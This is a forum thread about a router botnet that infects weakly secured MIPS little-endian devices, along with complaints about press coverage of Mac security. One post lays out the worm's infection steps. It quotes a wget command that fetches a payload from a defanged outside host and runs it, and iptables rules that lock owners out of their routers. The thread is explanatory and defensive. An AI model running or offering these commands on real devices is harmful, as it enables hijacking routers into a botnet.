[snowsislander]

OMFG! Do these people not even read industry news? For the past week, there has been all kinds of stories out there about botnets being built with freaking routers. What's the install base of Linksys routers running DD-WRT?  I mean come on! When are they going to give up on that 'security by obscurity' canard?

Yes, you have a good point. I hadn't myself heard about this router bot-net until I saw your post, but I did some research and it appears not only are we talking about a relatively small base of equipment, but the equipment has to be dangerously configured to even be vulnerable:

You are only vulnerable if:

1. Your device is a mipsel (MIPS running in little-endian mode, this is what the worm is compiled for) device.
2. Your device also has telnet, SSH or web-based interfaces available to the WAN, and
3. Your username and password combinations are weak, OR the daemons that your firmware uses are exploitable.

   As such, 90% of the routers and modems participating in this botnet are participating due to user-error (the user themselves or otherwise). Unfortunately, it seems that some of the people covering this botnet do not understand this point, and it is making us look like a bunch of idiots.

It does look like more than just DD-WRT routers are targeted; it appears to me that the exploitation method (once they have a root shell on a poorly configured machine) is fairly universal for any mipsel unit running most any Linux-based router code:

Get a shell on the vulnerable device (methods vary). Once a shell is acquired, the bot does the following things:

# rm -f /var/tmp/udhcpc.env
# wget

If wget is present, then it uses wget to download hxxp://dweb.webhop.net/.bb/udhcpc.env , and runs it in the background.

If wget is not present, the bot looks for "busybox ftpget", and then tries falling back to a tftp client. Once it is downloaded, it launches it in the background. The following snippet is the variant it uses if it finds that wget is usable.

# wget hxxp://dweb.webhop.net/.bb/udhcpc.env -P /var/tmp && chmod +x /var/tmp/udhcpc.env && /var/tmp/udhcpc.env &

udhcpc.env 100% |*****************************| 33744 00:00 ETA

It then takes several steps to lock anybody out of the device, including blocking telnet, sshd and web ports.

# iptables -A INPUT -p tcp --dport 23 -j DROP
# iptables -A INPUT -p tcp --dport 22 -j DROP
# iptables -A INPUT -p tcp --dport 80 -j DROP

This concludes the infection process.

[zeugma]

Your comments are well taken. I mentioned the DD-WRT routers specifically, because those were what I'd seen mentioned, and is what I run, so I remembered it. I was initially worried about it until I heard the details of what was necessary for it to be vulnerable. If you run an externally facing system of any type and use default passwords you pretty much deserve to be p0wned. The point stands that the vulnerable number of systems is tiny compared to te installed base of completely unprotected Macs, yet these presstitutes still have the nerve to make those silly 'market share' arguments.

I don't even own a Mac, and have only even played with one a couple of times, but this kind of reporting chaps my ass.